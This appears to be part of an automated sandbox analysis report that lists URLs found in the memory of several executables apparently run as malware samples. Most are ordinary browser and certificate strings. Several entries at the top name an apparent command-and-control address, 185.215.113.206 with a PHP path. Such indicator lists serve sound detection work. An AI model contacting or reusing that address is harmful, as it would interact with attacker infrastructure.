Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpA
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpCGCBGDBKJJKEBFBFH
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpH
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpP
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpY
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php_
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpd
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpion:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpj
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpn
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpp
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpv
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/h
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.206BFHJK--
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206S
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.1786901695.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1872899047.000000000174C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: e192e43b61.exe, 0000000D.00000003.2806047135.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2908880792.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2914261433.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2883370297.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro(x
Source: e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883362074.000000000144E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-timesp
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressionsXq
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 0000001D.00000002.2986603833.000001E762BE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762944000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2881911418.000001E762CF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2884209139.000001E762CF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2986971978.000001E762CD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2981878374.000001E76137E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2887157519.000001E762CD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E76382C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E763803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2986971978.000001E762CB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762905000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2887157519.000001E762CC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762908000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E763840000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983794051.000001E762703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2982682375.000001E7624C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E76380F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shandlerSvc
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modu
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: e192e43b61.exe, 0000000A.00000003.2899300146.0000000001171000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3002770667.000001E764E43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E76374D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.popup-notification-description
Source: firefox.exe, 0000001D.00000002.3002770667.000001E764E96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:scope
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulApplication
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/locale/safebrowsing/sa
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/printPreviewPag
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ContextualIdenti
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616773453.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2801742909.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
